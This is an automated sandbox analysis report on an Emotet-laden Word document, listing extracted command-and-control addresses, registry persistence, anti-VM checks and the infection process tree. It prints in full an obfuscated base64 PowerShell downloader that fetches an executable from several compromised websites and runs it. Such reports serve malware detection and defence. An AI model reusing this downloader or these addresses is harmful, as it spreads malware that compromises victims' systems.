9e1d7cd63b0edcb4b3c4b1c86ecf477245ba82b4291bf26484fe2dd6cd9d12a1

Analysis

max time kernel
144s
max time network
146s
resource
win10

Sharing

Copy URL

Twitter E-mail

General

Target

Docs_8284e996aea8e5075256c03a93eaa6df.4
Sample

191011-nrbapdm1ce
SHA256

9e1d7cd63b0edcb4b3c4b1c86ecf477245ba82b4291bf26484fe2dd6cd9d12a1

Score

N/A

Malware Config

Extracted

Family

emotet

186.75.241.230:80

181.143.194.138:443

181.143.53.227:21

85.104.59.244:20

80.11.163.139:443

167.71.10.37:8080

104.131.44.150:8080

185.187.198.15:80

133.167.80.63:7080

198.199.114.69:8080

144.139.247.220:80

152.89.236.214:8080

78.24.219.147:8080

92.222.216.44:8080

46.105.131.87:80

190.226.44.20:21

182.176.132.213:8090

85.54.169.141:8080

192.81.213.192:8080

101.187.237.217:20

rsa_pubkey.plain

Signatures

Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx

Drops Office document 4 IoCs

Processes:

WINWORD.EXE

at	description	ioc	Process
29344	File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm	WINWORD.EXE
29485	File created	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	WINWORD.EXE
34657	File opened for modification	C:\Users\Admin\AppData\Local\Temp\Docs_8284e996aea8e5075256c03a93eaa6df.4.doc	WINWORD.EXE
37078	File created	C:\Users\Admin\AppData\Local\Temp\~$cs_8284e996aea8e5075256c03a93eaa6df.4.doc	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

SppExtComObj.exepowershell.exe877.exetabletmspterm.exe

at	description	Process	procid_target
32985	PID 2780 wrote to memory of 3600	SppExtComObj.exe	42
56922	PID 3068 wrote to memory of 2596	powershell.exe	46
57266	PID 2596 wrote to memory of 2564	877.exe	47
65016	PID 1668 wrote to memory of 1644	tabletmspterm.exe	49

Checks system information in the registry (likely anti-VM) 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

at	description	ioc	Process
33891	Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	WINWORD.EXE
33891	Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	WINWORD.EXE

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

at	description	ioc	Process
33891	Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
33891	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
33891	Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
33891	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
33891	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Checks processor information in registry (likely anti-VM) 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

at	description	ioc	Process
33891	Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
33891	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

at	description	Process
46860	Token: SeDebugPrivilege	powershell.exe

Suspicious behavior: EnumeratesProcesses

Modifies registry class 1 TTPs 84 IoCs

persistence

Modify Registry

T1112

Processes:

877.exe877.exetabletmspterm.exe

at	description	ioc	Process
57141	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1	877.exe
57141	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\ = "Recalc Document"	877.exe
57141	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon	877.exe
57141	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon\ = "C:\\Users\\Admin\\877.exe,0"	877.exe
57141	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec	877.exe
57141	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell	877.exe
57141	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open	877.exe
57141	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec\ = "[open(\"%1\")]"	877.exe
57141	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec	877.exe
57141	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print	877.exe
57141	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec\ = "[print(\"%1\")]"	877.exe
57141	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec	877.exe
57141	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto	877.exe
57141	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec\ = "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]"	877.exe
57141	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command	877.exe
57141	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command\ = "C:\\Users\\Admin\\877.exe /dde"	877.exe
57141	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command	877.exe
57141	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command\ = "C:\\Users\\Admin\\877.exe /dde"	877.exe
57141	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command	877.exe
57141	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command\ = "C:\\Users\\Admin\\877.exe /dde"	877.exe
57141	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL	877.exe
57141	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ = "Recalc.Document.1"	877.exe
57141	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew	877.exe
57141	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew\NullFile	877.exe
57375	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1	877.exe
57375	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\ = "Recalc Document"	877.exe
57375	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon	877.exe
57375	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon\ = "C:\\Users\\Admin\\877.exe,0"	877.exe
57375	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec	877.exe
57375	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec\ = "[open(\"%1\")]"	877.exe
57375	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec	877.exe
57375	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec\ = "[print(\"%1\")]"	877.exe
57375	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec	877.exe
57375	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec\ = "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]"	877.exe
57375	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command	877.exe
57375	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command\ = "C:\\Users\\Admin\\877.exe /dde"	877.exe
57375	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command	877.exe
57375	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command\ = "C:\\Users\\Admin\\877.exe /dde"	877.exe
57375	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command	877.exe
57375	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command\ = "C:\\Users\\Admin\\877.exe /dde"	877.exe
57375	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL	877.exe
57375	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ = "Recalc.Document.1"	877.exe
57375	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew	877.exe
57375	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew\NullFile	877.exe
64813	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1	tabletmspterm.exe
64813	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\ = "Recalc Document"	tabletmspterm.exe
64813	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon	tabletmspterm.exe
64813	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE,0"	tabletmspterm.exe
64813	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec	tabletmspterm.exe
64828	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec\ = "[open(\"%1\")]"	tabletmspterm.exe
64828	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec	tabletmspterm.exe
64828	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec\ = "[print(\"%1\")]"	tabletmspterm.exe
64828	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec	tabletmspterm.exe
64828	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec\ = "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]"	tabletmspterm.exe
64828	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command	tabletmspterm.exe
64828	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE /dde"	tabletmspterm.exe
64828	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command	tabletmspterm.exe
64828	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE /dde"	tabletmspterm.exe
64828	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command	tabletmspterm.exe
64828	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE /dde"	tabletmspterm.exe
64828	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL	tabletmspterm.exe
64828	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ = "Recalc.Document.1"	tabletmspterm.exe
64828	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew	tabletmspterm.exe
64828	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew\NullFile	tabletmspterm.exe
65094	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1	tabletmspterm.exe
65094	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\ = "Recalc Document"	tabletmspterm.exe
65094	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon	tabletmspterm.exe
65094	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE,0"	tabletmspterm.exe
65094	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec	tabletmspterm.exe
65094	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec\ = "[open(\"%1\")]"	tabletmspterm.exe
65094	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec	tabletmspterm.exe
65094	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec\ = "[print(\"%1\")]"	tabletmspterm.exe
65094	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec	tabletmspterm.exe
65094	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec\ = "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]"	tabletmspterm.exe
65094	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command	tabletmspterm.exe
65094	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE /dde"	tabletmspterm.exe
65094	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command	tabletmspterm.exe
65094	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE /dde"	tabletmspterm.exe
65094	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command	tabletmspterm.exe
65094	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE /dde"	tabletmspterm.exe
65094	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL	tabletmspterm.exe
65094	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ = "Recalc.Document.1"	tabletmspterm.exe
65094	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew	tabletmspterm.exe
65094	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew\NullFile	tabletmspterm.exe

Emotet Sync 1 IoCs

trojan banker

Processes:

877.exe

description	ioc	Process
Event created	Global\E145925EC	877.exe

Suspicious behavior: EmotetMutantsSpam

Drops file in system dir 6 IoCs

Processes:

877.exetabletmspterm.exe

at	description	ioc	Process
63282	File renamed	C:\Users\Admin\877.exe => C:\Windows\SysWOW64\tabletmspterm.exe	877.exe
82172	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	tabletmspterm.exe
82297	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	tabletmspterm.exe
82297	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	tabletmspterm.exe
82313	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	tabletmspterm.exe
82313	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	tabletmspterm.exe

emotet family
family

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_8284e996aea8e5075256c03a93eaa6df.4.doc" /o ""
1⤵
- Drops Office document
- Checks system information in the registry (likely anti-VM)
- Enumerates system info in registry
- Checks processor information in registry (likely anti-VM)
PID:3544

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:2780

C:\Windows\System32\SLUI.exe
"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
1⤵
PID:3600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAOQAwADUAMAAyADAAYwA5ADAAYwA1AD0AJwBiADgAMQAzADcANgAzADQAMwA5AGMAMABjACcAOwAkAGIAeAAyADQANwAwADQANgAwADUAMgAgAD0AIAAnADgANwA3ACcAOwAkAHgAOQAwADEAeAA0ADMAMQAyADMANQAzAD0AJwB4AGIAYwA5ADEAMgAyADAANAAzAHgAJwA7ACQAYgA0ADgAMAA3ADkAMAA3ADAAYgAxADkAMgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgB4ADIANAA3ADAANAA2ADAANQAyACsAJwAuAGUAeABlACcAOwAkAHgAMwBjAGIAMAA0ADIAOQA1ADcANgA4AD0AJwBjAHgAMQB4AHgAeAB4ADYAYgA4ADUAJwA7ACQAYwA0ADQAMgA5ADAAMgAwADIAeAB4ADAANAA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAFQALgB3AEUAYgBDAGwAaQBFAE4AVAA7ACQAYgBjADMAMwAwADEAOAAwAGMAMAA4AD0AJwBoAHQAdABwAHMAOgAvAC8AdABoAGUAcwBpAGwAdgBlAHIAYQBuAHQALgBjAG8AbQAvAHQAZQBzAHQALwBkAHYAcgA5AC8AKgBoAHQAdABwADoALwAvAGYAaQByAHMAdABtAG4AZAAuAGMAbwBtAC8AdwBwAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADMAawA5ADYAMAAvACoAaAB0AHQAcAA6AC8ALwBjAGkAdAB5AGwAYQBuAGQAZwBvAHYAYQBwAC4AbgBlAHQALwA4AGQAcQBzADUAZgB2AC8ANgBKAC8AKgBoAHQAdABwADoALwAvAGQAZQByAGUAZABpAGEALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBjAGIAYQBzAC8AKgBoAHQAdABwADoALwAvAGYAYQB0AHQAbwByAGkAYQBpAHAAbwBuAHQAaQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbwAxAHcAaQBFAHEAUABmAE4ALwAnAC4AIgBTAHAAYABsAGkAdAAiACgAJwAqACcAKQA7ACQAeAAzADMANgBjADUAMAAxADAAYgAyADcAPQAnAGIAOQA2ADcAYgAxAHgAMgAwADEAMgAnADsAZgBvAHIAZQBhAGMAaAAoACQAeAAzADcANQAwADAAOAAxADAAMAA1ADcAYwAgAGkAbgAgACQAYgBjADMAMwAwADEAOAAwAGMAMAA4ACkAewB0AHIAeQB7ACQAYwA0ADQAMgA5ADAAMgAwADIAeAB4ADAANAAuACIAZABPAFcAbgBMAGAATwBhAGQAZgBgAEkATABFACIAKAAkAHgAMwA3ADUAMAAwADgAMQAwADAANQA3AGMALAAgACQAYgA0ADgAMAA3ADkAMAA3ADAAYgAxADkAMgApADsAJABiADYAMgA2ADgAMQB4AGMAMwBjAHgANAA9ACcAeABiADAAMAA1AGIAMAA1ADAANgB4ADMANQAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAGIANAA4ADAANwA5ADAANwAwAGIAMQA5ADIAKQAuACIATABlAGAATgBHAHQAaAAiACAALQBnAGUAIAAyADcAOQAxADgAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AEEAYABSAHQAIgAoACQAYgA0ADgAMAA3ADkAMAA3ADAAYgAxADkAMgApADsAJAB4ADIAYgAwADcAOAA3ADcAOAA0ADAAMAA9ACcAYgAxADAAMgAwADEAMAAxADAAMAA2ADAAJwA7AGIAcgBlAGEAawA7ACQAYgAyADAAOAAyADAAeAAwADIAYwAzADMANQA9ACcAeAAxAHgAMQAxAHgAMAA0AGMANQA4ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGIAYwA1ADkAMAAwAGIAMwA4ADEAOAAyADcAPQAnAGMAMAA3ADkAOAAwADkAOQA2ADgANgA4ADkAJwA=
1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:3068

C:\Users\Admin\877.exe
"C:\Users\Admin\877.exe"
1⤵
- Suspicious use of WriteProcessMemory
- Modifies registry class
PID:2596

C:\Users\Admin\877.exe
--406b0556
1⤵
- Modifies registry class
- Emotet Sync
- Drops file in system dir
PID:2564

C:\Windows\SysWOW64\tabletmspterm.exe
"C:\Windows\SysWOW64\tabletmspterm.exe"
1⤵
- Suspicious use of WriteProcessMemory
- Modifies registry class
PID:1668

C:\Windows\SysWOW64\tabletmspterm.exe
--356fff06
1⤵
- Drops file in system dir
PID:1644

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1644-8-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/2564-5-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/2596-3-0x0000000003A90000-0x0000000003AA4000-memory.dmp

Filesize
80KB

Download